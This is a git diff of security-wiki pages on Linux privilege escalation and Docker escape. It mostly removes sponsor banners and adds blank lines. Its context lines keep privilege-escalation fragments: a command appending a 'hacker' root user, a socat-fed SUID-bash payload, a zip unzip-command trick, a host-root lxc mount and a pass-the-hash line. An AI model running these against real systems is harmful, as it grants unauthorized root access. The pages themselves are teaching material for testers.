diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md
index afccf5db5..2fb4e830e 100644
--- a/src/linux-hardening/privilege-escalation/README.md
+++ b/src/linux-hardening/privilege-escalation/README.md
@@ -1655,3 +1655,5 @@ cisco-vmanage.md
- [https://www.linode.com/docs/guides/what-is-systemd/](https://www.linode.com/docs/guides/what-is-systemd/)
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/README.md b/src/linux-hardening/privilege-escalation/docker-security/README.md
index d48f733d4..4fd8f33e2 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/README.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/README.md
@@ -2,14 +2,6 @@
{{#include ../../../banners/hacktricks-training.md}}
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
-
## **Basic Docker Engine Security**
The **Docker engine** employs the Linux kernel's **Namespaces** and **Cgroups** to isolate containers, offering a basic layer of security. Additional protection is provided through **Capabilities dropping**, **Seccomp**, and **SELinux/AppArmor**, enhancing container isolation. An **auth plugin** can further restrict user actions.
@@ -104,16 +96,6 @@ tar -zcvf private_keys_backup.tar.gz ~/.docker/trust/private
When switching Docker hosts, it's necessary to move the root and repository keys to maintain operations.
----
-
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
-
## Containers Security Features
@@ -421,12 +403,7 @@ authz-and-authn-docker-access-authorization-plugin.md
- [https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57](https://towardsdatascience.com/top-20-docker-security-tips-81c41dd06f57)
- [https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/](https://resources.experfy.com/bigdata-cloud/top-20-docker-security-tips/)
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=docker-security) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-security" %}
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md b/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md
index a23a6b769..23c19c7e1 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/abusing-docker-socket-for-privilege-escalation.md
@@ -41,3 +41,5 @@ You could also **abuse a mount to escalate privileges** inside the container.
In this page we have discussed ways to escalate privileges using docker flags, you can find **ways to abuse these methods using curl** command in the page:
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/apparmor.md b/src/linux-hardening/privilege-escalation/docker-security/apparmor.md
index 0455067e0..8290b7189 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/apparmor.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/apparmor.md
@@ -291,3 +291,5 @@ chmod +x /tmp/test.pl
```
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md b/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md
index 3cef5bc8e..e6bcdf1ff 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/authz-and-authn-docker-access-authorization-plugin.md
@@ -194,3 +194,5 @@ Remember to **re-enable the plugin after escalating**, or a **restart of docker
- [https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/](https://staaldraad.github.io/post/2019-07-11-bypass-docker-plugin-with-containerd/)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/cgroups.md b/src/linux-hardening/privilege-escalation/docker-security/cgroups.md
index 82614f093..fa609e204 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/cgroups.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/cgroups.md
@@ -88,3 +88,5 @@ The **root cgroup** is an exception to these rules, allowing direct process plac
- **Book: How Linux Works, 3rd Edition: What Every Superuser Should Know By Brian Ward**
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
index e19fddb22..be328c4c6 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/README.md
@@ -2,14 +2,6 @@
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
-
## Automatic Enumeration & Escape
- [**linpeas**](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS): It can also **enumerate containers**
@@ -503,13 +495,6 @@ cat /proc/self/status | grep CapEff
The second technique explained in the post [https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/](https://labs.withsecure.com/blog/abusing-the-access-to-mount-namespaces-through-procpidroot/) indicates how you can abuse bind mounts with user namespaces, to affect files inside the host (in that specific case, delete files).
-
-
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
-
## CVEs
### Runc exploit (CVE-2019-5736)
@@ -650,11 +635,6 @@ If you are in **userspace** (**no kernel exploit** involved) the way to find new
- [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/exposed-docker-socket)
- [https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4](https://bishopfox.com/blog/kubernetes-pod-privilege-escalation#Pod4)
-
-
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=docker-breakout-privilege-escalation) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=docker-breakout-privilege-escalation" %}
-
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
index 7d16ec4a4..2db7f565d 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/docker-release_agent-cgroups-escape.md
@@ -59,3 +59,5 @@ sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
index 5c3c57d9f..686432056 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/release_agent-exploit-relative-paths-to-pids.md
@@ -83,3 +83,5 @@ cat ${OUTPUT_PATH}
```
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
index 718263059..889b3bf02 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/sensitive-mounts.md
@@ -2,10 +2,6 @@
{{#include ../../../../banners/hacktricks-training.md}}
-
-
-{% embed url="https://websec.nl/" %}
-
The exposure of `/proc` and `/sys` without proper namespace isolation introduces significant security risks, including attack surface enlargement and information disclosure. These directories contain sensitive files that, if misconfigured or accessed by an unauthorized user, can lead to container escape, host modification, or provide information aiding further attacks. For instance, incorrectly mounting `-v /proc:/host/proc` can bypass AppArmor protection due to its path-based nature, leaving `/host/proc` unprotected.
**You can find further details of each potential vuln in** [**https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts**](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/sensitive-mounts)**.**
@@ -175,8 +171,6 @@ This directory permits access to modify kernel variables, usually via `sysctl(2)
- [Understanding and Hardening Linux Containers](https://research.nccgroup.com/wp-content/uploads/2020/07/ncc_group_understanding_hardening_linux_containers-1-1.pdf)
- [Abusing Privileged and Unprivileged Linux Containers](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2016/june/container_whitepaper.pdf)
-
-
-{% embed url="https://websec.nl/" %}
-
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md
index ce967ad2d..95f831cab 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/docker-privileged.md
@@ -240,3 +240,5 @@ PID USER TIME COMMAND
- [https://www.redhat.com/sysadmin/privileged-flag-container-engines](https://www.redhat.com/sysadmin/privileged-flag-container-engines)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md
index 6df879add..94f14f8c2 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/README.md
@@ -45,3 +45,5 @@ user-namespace.md
{{#endref}}
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md
index d7f4c2d65..d03634d4f 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/cgroup-namespace.md
@@ -90,3 +90,5 @@ Also, you can only **enter in another process namespace if you are root**. And y
- [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md
index 14b23338a..498749fc3 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/ipc-namespace.md
@@ -99,3 +99,5 @@ ipcs -m # Nothing is seen
- [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md
index 7cdc2cf0d..2dc22792b 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/mount-namespace.md
@@ -134,3 +134,5 @@ vmware-root_662-2689143848
- [https://unix.stackexchange.com/questions/464033/understanding-how-mount-namespaces-work-in-linux](https://unix.stackexchange.com/questions/464033/understanding-how-mount-namespaces-work-in-linux)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md
index 8ab89ce7f..3a82a4686 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/network-namespace.md
@@ -85,3 +85,5 @@ Also, you can only **enter in another process namespace if you are root**. And y
- [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md
index 0d4297366..90c5d3af2 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/pid-namespace.md
@@ -89,3 +89,5 @@ Also, you can only **enter in another process PID namespace if you are root**. A
- [https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory](https://stackoverflow.com/questions/44666700/unshare-pid-bin-bash-fork-cannot-allocate-memory)
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
index 5d2201886..7021fed99 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/time-namespace.md
@@ -70,3 +70,5 @@ nsenter -T TARGET_PID --pid /bin/bash
```
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md
index 88d39ccc6..58ae871e8 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/user-namespace.md
@@ -146,3 +146,5 @@ Probando: 0x141 . . . Error
```
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md b/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
index 62b92742a..66ef3998c 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/namespaces/uts-namespace.md
@@ -76,3 +76,5 @@ nsenter -u TARGET_PID --pid /bin/bash
```
{{#include ../../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/seccomp.md b/src/linux-hardening/privilege-escalation/docker-security/seccomp.md
index 17ec393d2..a61c3e964 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/seccomp.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/seccomp.md
@@ -156,3 +156,5 @@ Following output shows the “docker inspect” displaying the profile:
```
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md b/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md
index a733d5934..1be4c1caf 100644
--- a/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md
+++ b/src/linux-hardening/privilege-escalation/docker-security/weaponizing-distroless.md
@@ -28,3 +28,5 @@ Coming at some point of 2023...
\***\*[**In this post,**](https://www.form3.tech/engineering/content/exploiting-distroless-images) it is explained that the binary **`openssl`** is frequently found in these containers, potentially because it's **needed\*\* by the software that is going to be running inside the container.
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
index f34a6d548..92cbb164a 100644
--- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
+++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/README.md
@@ -262,3 +262,5 @@ Inside OpenBSD the **auth** group usually can write in the folders _**/etc/skey*
These permissions may be abused with the following exploit to **escalate privileges** to root: [https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot)
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
index f308931ab..7ec437f13 100644
--- a/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
+++ b/src/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation.md
@@ -89,3 +89,5 @@ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursiv
```
{{#include ../../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/ld.so.conf-example.md b/src/linux-hardening/privilege-escalation/ld.so.conf-example.md
index ab2683a9b..5bb829d3e 100644
--- a/src/linux-hardening/privilege-escalation/ld.so.conf-example.md
+++ b/src/linux-hardening/privilege-escalation/ld.so.conf-example.md
@@ -151,3 +151,5 @@ ldd sharedvuln
**As you can see, having sudo privileges over `ldconfig` you can exploit the same vulnerability.**
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/linux-active-directory.md b/src/linux-hardening/privilege-escalation/linux-active-directory.md
index 5e355bae5..ee8c31452 100644
--- a/src/linux-hardening/privilege-escalation/linux-active-directory.md
+++ b/src/linux-hardening/privilege-escalation/linux-active-directory.md
@@ -2,8 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-{% embed url="https://websec.nl/" %}
-
A linux machine can also be present inside an Active Directory environment.
A linux machine in an AD might be **storing different CCACHE tickets inside files. This tickets can be used and abused as any other kerberos ticket**. In order to read this tickets you will need to be the user owner of the ticket or **root** inside the machine.
@@ -125,6 +123,6 @@ crackmapexec 10.XXX.XXX.XXX -u 'ServiceAccount$' -H "HashPlaceholder" -d "YourDO
- [https://github.com/TarlogicSecurity/tickey](https://github.com/TarlogicSecurity/tickey)
- [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#linux-active-directory)
-{% embed url="https://websec.nl/" %}
-
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/linux-capabilities.md b/src/linux-hardening/privilege-escalation/linux-capabilities.md
index 2fa1b2717..7808490a3 100644
--- a/src/linux-hardening/privilege-escalation/linux-capabilities.md
+++ b/src/linux-hardening/privilege-escalation/linux-capabilities.md
@@ -2,11 +2,6 @@
{{#include ../../banners/hacktricks-training.md}}
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.\\
-
-{% embed url="https://www.rootedcon.com/" %}
## Linux Capabilities
@@ -346,14 +341,6 @@ docker run --rm -it --cap-add=ALL r.j3ss.co/amicontained bash
docker run --rm -it --cap-drop=ALL --cap-add=SYS_PTRACE r.j3ss.co/amicontained bash
```
-
-
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
-
## Privesc/Container Escape
Capabilities are useful when you **want to restrict your own processes after performing privileged operations** (e.g. after setting up chroot and binding to a socket). However, they can be exploited by passing them malicious commands or arguments which are then run as root.
@@ -1039,13 +1026,6 @@ int main(int argc,char* argv[] )
**The code of this technique was copied from the laboratory of "Abusing DAC_READ_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
-
-
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
## CAP_DAC_OVERRIDE
@@ -1437,13 +1417,6 @@ kill -s SIGUSR1
electron-cef-chromium-debugger-abuse.md
{{#endref}}
-
-
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
## CAP_NET_BIND_SERVICE
@@ -1700,10 +1673,6 @@ In summary, `CAP_SETPCAP` allows a process to modify the capability sets of othe
- [https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot](https://labs.withsecure.com/publications/abusing-the-access-to-mount-namespaces-through-procpidroot)
-
-
-
-[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
-
-{% embed url="https://www.rootedcon.com/" %}
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/logstash.md b/src/linux-hardening/privilege-escalation/logstash.md
index fe091391a..bdf1cc346 100644
--- a/src/linux-hardening/privilege-escalation/logstash.md
+++ b/src/linux-hardening/privilege-escalation/logstash.md
@@ -59,3 +59,5 @@ With **config.reload.automatic: true** in **/etc/logstash/logstash.yml**, Logsta
## References
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
index 679d2a521..0fae9bba6 100644
--- a/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
+++ b/src/linux-hardening/privilege-escalation/nfs-no_root_squash-misconfiguration-pe.md
@@ -124,3 +124,5 @@ drwxr-x--- 6 1008 1009 1024 Apr 5 2017 9.3_old
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/payloads-to-execute.md b/src/linux-hardening/privilege-escalation/payloads-to-execute.md
index 37626a2de..c308fb270 100644
--- a/src/linux-hardening/privilege-escalation/payloads-to-execute.md
+++ b/src/linux-hardening/privilege-escalation/payloads-to-execute.md
@@ -133,3 +133,5 @@ echo hacker:$((mkpasswd -m SHA-512 myhackerpass || openssl passwd -1 -salt mysal
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md
index e54915fa9..3b23e4f9f 100644
--- a/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md
+++ b/src/linux-hardening/privilege-escalation/runc-privilege-escalation.md
@@ -42,3 +42,5 @@ runc run demo
> This won't always work as the default operation of runc is to run as root, so running it as an unprivileged user simply cannot work (unless you have a rootless configuration). Making a rootless configuration the default isn't generally a good idea because there are quite a few restrictions inside rootless containers that don't apply outside rootless containers.
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/selinux.md b/src/linux-hardening/privilege-escalation/selinux.md
index 548f3d785..f2d1a3f5a 100644
--- a/src/linux-hardening/privilege-escalation/selinux.md
+++ b/src/linux-hardening/privilege-escalation/selinux.md
@@ -21,3 +21,5 @@ system_u:system_r:container_t:s0:c647,c780
There are SELinux users in addition to the regular Linux users. SELinux users are part of an SELinux policy. Each Linux user is mapped to a SELinux user as part of the policy. This allows Linux users to inherit the restrictions and security rules and mechanisms placed on SELinux users.
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/socket-command-injection.md b/src/linux-hardening/privilege-escalation/socket-command-injection.md
index 3b5a9002d..28474ef58 100644
--- a/src/linux-hardening/privilege-escalation/socket-command-injection.md
+++ b/src/linux-hardening/privilege-escalation/socket-command-injection.md
@@ -42,3 +42,5 @@ echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat -
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md b/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
index 11d4253c5..d4f0faf41 100644
--- a/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
+++ b/src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
@@ -50,3 +50,5 @@ for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8
**For further details check the post [https://blog.hrncirik.net/cve-2023-46214-analysis](https://blog.hrncirik.net/cve-2023-46214-analysis)**
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md b/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md
index 774e13999..97b18db59 100644
--- a/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md
+++ b/src/linux-hardening/privilege-escalation/ssh-forward-agent-exploitation.md
@@ -28,3 +28,5 @@ Another option, is that the user owner of the agent and root may be able to acce
**Check the [original research here](https://www.clockwork.com/insights/ssh-agent-hijacking/)**
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
index d497174d6..a66aa27b0 100644
--- a/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
+++ b/src/linux-hardening/privilege-escalation/wildcards-spare-tricks.md
@@ -70,3 +70,5 @@ zip name.zip files -T --unzip-command "sh -c whoami"
```
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/privilege-escalation/write-to-root.md b/src/linux-hardening/privilege-escalation/write-to-root.md
index 65f4bbafc..e96ce7427 100644
--- a/src/linux-hardening/privilege-escalation/write-to-root.md
+++ b/src/linux-hardening/privilege-escalation/write-to-root.md
@@ -48,3 +48,5 @@ TODO
The file located in `/proc/sys/fs/binfmt_misc` indicates which binary should execute whic type of files. TODO: check the requirements to abuse this to execute a rev shell when a common file type is open.
{{#include ../../banners/hacktricks-training.md}}
+
+
diff --git a/src/linux-hardening/useful-linux-commands/README.md b/src/linux-hardening/useful-linux-commands/README.md
index f69d43525..871e7427d 100644
--- a/src/linux-hardening/useful-linux-commands/README.md
+++ b/src/linux-hardening/useful-linux-commands/README.md
@@ -1,12 +1,5 @@
# Useful Linux Commands
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{{#include ../../banners/hacktricks-training.md}}
@@ -131,14 +124,6 @@ sudo chattr -i file.txt #Remove the bit so you can delete it
7z l file.zip
```
-
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-
## Bash for Windows
```bash
@@ -325,10 +310,4 @@ iptables -P OUTPUT ACCEPT
{{#include ../../banners/hacktricks-training.md}}
-
-\
-Use [**Trickest**](https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
-
-{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
